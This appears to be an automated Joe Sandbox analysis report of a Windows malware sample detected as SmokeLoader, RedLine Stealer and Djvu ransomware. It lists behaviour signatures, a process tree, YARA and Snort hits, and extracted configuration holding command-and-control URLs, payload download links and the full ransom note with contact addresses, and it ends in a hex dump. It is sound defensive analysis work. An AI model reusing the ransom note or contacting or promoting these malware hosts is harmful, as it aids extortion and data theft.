Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:724879
MD5:644232606a176287a73169b177eb8752
SHA1:0a09865b7c29d4a90f7f06af19940580ac7e8847
SHA256:365904fa34452030915b29fcbf60978159e63a6240622ffd72b6d564a591bad4
Tags:exeTeamBot
Infos:

Detection

Djvu, RedLine, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)

Classification

  • System is w10x64
  • file.exe (PID: 5916 cmdline: C:\Users\user\Desktop\file.exe MD5: 644232606A176287A73169B177EB8752)
    • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 6246.exe (PID: 5608 cmdline: C:\Users\user\AppData\Local\Temp\6246.exe MD5: 36FC2440660C5F4509C3ABCDDE9A1C3A)
        • 6246.exe (PID: 1420 cmdline: C:\Users\user\AppData\Local\Temp\6246.exe MD5: 36FC2440660C5F4509C3ABCDDE9A1C3A)
      • 69A9.exe (PID: 5828 cmdline: C:\Users\user\AppData\Local\Temp\69A9.exe MD5: BD0DFD6CBAE2B012D4A5F155D10ED054)
      • 7795.exe (PID: 4132 cmdline: C:\Users\user\AppData\Local\Temp\7795.exe MD5: D878530A6E5C388668853A620D1B6E05)
        • WerFault.exe (PID: 2248 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • 837D.exe (PID: 2188 cmdline: C:\Users\user\AppData\Local\Temp\837D.exe MD5: D878530A6E5C388668853A620D1B6E05)
        • WerFault.exe (PID: 6036 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • 8C19.exe (PID: 5088 cmdline: C:\Users\user\AppData\Local\Temp\8C19.exe MD5: D30C815C9E13D428430F2A8B4018D3D5)
      • explorer.exe (PID: 6040 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 6076 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 4316.exe (PID: 376 cmdline: C:\Users\user\AppData\Local\Temp\4316.exe MD5: 2D29421E985E4FB5F6ABB42FA3A502C1)
        • conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • thduhcf (PID: 4692 cmdline: C:\Users\user\AppData\Roaming\thduhcf MD5: 644232606A176287A73169B177EB8752)
  • idduhcf (PID: 5756 cmdline: C:\Users\user\AppData\Roaming\idduhcf MD5: BD0DFD6CBAE2B012D4A5F155D10ED054)
  • cleanup
{"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://winnlinne.com/files/1/build3.exe"], "C2 url": "http://winnlinne.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-o7UXxOstmw\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@fishmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0585Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA13FAceYhU2U1c4UWTllr\\\\n+Tuk+XUSQ1wltMj4YIkZO8gC\\/eMcKqujI1FVmup+yzqP8wc7QB9LzWX0jrRiMf3T\\\\nN9mx8nxooe9DnpWZGncSgtWk1vBXonr1ZZevgimChx0oyQVD1k79GsnK0vZrGs5D\\\\nsVtmmnmSp81muQRklsiXlDglezOEqDFm3f65a7Ur0bpQdrbw8sX7sHzgrpA2aG1L\\\\nkgTLp28Bvu1qWgNU7y+yD9Gvwt07Zo80Rq8BfZs8aPLLnnUAegSVder50pP1g8zk\\\\nvMMF8vWQsHC5o0vlUMlKsKbuEbgZPHlyJAJuxwW5ehBSg9rT35qrGiSNyTur9fwr\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----"}
{"C2 list": ["http://liubertiyyyul.net/", "http://bururutu44org.org/", "http://youyouumenia5.org/", "http://nvulukuluir.net/", "http://nuluitnulo.me/", "http://guluiiiimnstra.net/"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.307169162.0000000000720000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x3d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        00000009.00000000.491916459.00000000005F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          Click to see the 62 entries
          SourceRuleDescriptionAuthorStrings
          5.2.thduhcf.700e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            0.2.file.exe.710e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              8.0.6246.exe.400000.3.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
              • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
              8.0.6246.exe.400000.4.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
              • 0xe0dea:$s1: http://
              • 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
              • 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
              • 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
              • 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
              • 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
              • 0xe0dea:$f1: http://
              8.0.6246.exe.400000.4.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
                Click to see the 70 entries
                No Sigma rule has matched
                Timestamp:192.168.2.545.136.151.10249702802851115 10/17/22-22:07:06.666147
                SID:2851115
                Source Port:49702
                Destination Port:80
                Protocol:TCP
                Classtype:Attempted Administrator Privilege Gain
                Timestamp:192.168.2.534.91.216.4949705802039103 10/17/22-22:07:11.143612
                SID:2039103
                Source Port:49705
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.5104.21.93.3049692802039103 10/17/22-22:06:42.842374
                SID:2039103
                Source Port:49692
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.5185.174.137.17449693802018581 10/17/22-22:06:30.526719
                SID:2018581
                Source Port:49693
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://185.174.137.174/s.exeAvira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Temp\8C19.exeAvira: detection malicious, Label: HEUR/AGEN.1210630
                Source: file.exeVirustotal: Detection: 38%Perma Link
                Source: file.exeReversingLabs: Detection: 43%
                Source: jamesmillion.xyzVirustotal: Detection: 12%Perma Link
                Source: avtlsgosecure.comVirustotal: Detection: 10%Perma Link
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\8C19.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\6246.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\837D.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\4316.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\7795.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\7AF0.exeJoe Sandbox ML: detected
                Source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://liubertiyyyul.net/", "http://bururutu44org.org/", "http://youyouumenia5.org/", "http://nvulukuluir.net/", "http://nuluitnulo.me/", "http://guluiiiimnstra.net/"]}
                Source: 8.0.6246.exe.400000.6.unpackMalware Configuration Extractor: Djvu {"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://winnlinne.com/files/1/build3.exe"], "C2 url": "http://winnlinne.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-o7UXxOstmw\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@fishmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0585Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: unknownHTTPS traffic detected: 185.220.204.62:443 -> 192.168.2.5:49694 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49695 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.144.15.231:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.144.15.231:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: C:\zuluyoku\gidifi7\lijatimocoy\hucukudorozige sin\xuhuxepu.pdb source: file.exe, thduhcf.1.dr
                Source: Binary string: \C:\zuluyoku\gidifi7\lijatimocoy\hucukudorozige sin\xuhuxepu.pdb source: file.exe, thduhcf.1.dr
                Source: Binary string: C:\nowobuwelajiwu jivebap\wutamaki\havuzoruyudo.pdb source: 6246.exe, 6246.exe, 00000004.00000000.458480067.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000008.00000000.475624690.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe.1.dr
                Source: Binary string: C:\rajor100.pdb source: 69A9.exe, 00000006.00000000.462971903.0000000000401000.00000020.00000001.01000000.00000008.sdmp, idduhcf, 00000013.00000000.560081813.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 69A9.exe.1.dr, idduhcf.1.dr
                Source: Binary string: M"C:\rajor100.pdb source: 69A9.exe, 00000006.00000000.462971903.0000000000401000.00000020.00000001.01000000.00000008.sdmp, idduhcf, 00000013.00000000.560081813.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 69A9.exe.1.dr, idduhcf.1.dr
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: aa C:\nowobuwelajiwu jivebap\wutamaki\havuzoruyudo.pdb6K source: 6246.exe, 00000004.00000000.458480067.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000008.00000000.475624690.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe.1.dr
                Source: Binary string: C:\xifibezevatem\nebopo.pdb source: 7795.exe, 00000007.00000000.474481270.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 837D.exe, 00000009.00000000.476307271.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 837D.exe.1.dr, 7795.exe.1.dr
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00404AE9 SetLastError,GetTickCount,GetLogicalDriveStringsW,LocalAlloc,UnregisterWait,GetNamedPipeHandleStateW,InterlockedIncrement,GetPrivateProfileStructA,GetConsoleAliasExesLengthW,EnumCalendarInfoA,EnumDateFormatsW,InterlockedCompareExchange,DeleteFiber,GetPrivateProfileStructA,LeaveCriticalSection,InterlockedExchange,RtlCaptureContext,FindResourceA,LocalFlags,OpenMutexA,GetStringTypeExA,GetComputerNameA,InitializeCriticalSection,LoadLibraryW,GetModuleHandleA,GetProcAddress,InterlockedDecrement,InterlockedDecrement,GetCurrentConsoleFont,GlobalFlags,FindNextVolumeA,GetConsoleFontSize,CreateJobObjectA,GetModuleHandleW,FormatMessageW,CreateActCtxA,GetConsoleTitleA,GetCalendarInfoA,VerifyVersionInfoW,FindFirstChangeNotificationA,InterlockedIncrement,InterlockedDecrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetProfileSectionA,MoveFileWithProgressA,GetCommandLineW,WriteConsoleA,lstrcpynW,CopyFileA,LoadLibraryA,MoveFileWithProgressW,CreateIoCompletionPort,GetOEMCP,InterlockedExchange,GetPrivateProfileStructA,DeleteVolumeMountPointA,GetConsoleAliasesLengthA,GetFileTime,GetStringTypeW,4_2_00404AE9
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior

                Networking

                barindex
                Source: C:\Windows\explorer.exeDomain query: github.com
                Source: C:\Windows\explorer.exeDomain query: dldsystem.com
                Source: C:\Windows\explorer.exeDomain query: furubujjul.net
                Source: C:\Windows\explorer.exeDomain query: pelegisr.com
                Source: C:\Windows\explorer.exeDomain query: avtlsgosecure.com
                Source: C:\Windows\explorer.exeNetwork Connect: 185.174.137.174 80Jump to behavior
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49692 -> 104.21.93.30:80
                Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.5:49693 -> 185.174.137.174:80
                Source: TrafficSnort IDS: 2851115 ETPRO TROJAN Win32/Fabookie.ek CnC Activity M2 192.168.2.5:49702 -> 45.136.151.102:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49705 -> 34.91.216.49:80
                Source: DNS query: jamesmillion.xyz
                Source: Malware configuration extractorURLs: http://winnlinne.com/lancer/get.php
                Source: Malware configuration extractorURLs: http://liubertiyyyul.net/
                Source: Malware configuration extractorURLs: http://bururutu44org.org/
                Source: Malware configuration extractorURLs: http://youyouumenia5.org/
                Source: Malware configuration extractorURLs: http://nvulukuluir.net/
                Source: Malware configuration extractorURLs: http://nuluitnulo.me/
                Source: Malware configuration extractorURLs: http://guluiiiimnstra.net/
                Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 17 Oct 2022 20:06:30 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 17 Oct 2022 19:59:09 GMTETag: "36200-5eb4068a369dc"Accept-Ranges: bytesContent-Length: 221696Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db a3 54 76 9f c2 3a 25 9f c2 3a 25 9f c2 3a 25 81 90 af 25 88 c2 3a 25 81 90 b9 25 e0 c2 3a 25 b8 04 41 25 9c c2 3a 25 9f c2 3b 25 0e c2 3a 25 81 90 be 25 a9 c2 3a 25 81 90 ae 25 9e c2 3a 25 81 90 ab 25 9e c2 3a 25 52 69 63 68 9f c2 3a 25 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3a 51 4b 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 01 00 00 58 17 00 00 00 00 00 06 a1 00 00 00 10 00 00 00 00 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 19 00 00 04 00 00 3c 0b 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c f3 01 00 28 00 00 00 00 e0 18 00 d8 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 39 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 1c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 ef 01 00 00 10 00 00 00 f0 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 dc 16 00 00 00 02 00 00 22 01 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 4b 00 00 00 e0 18 00 00 4c 00 00 00 16 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
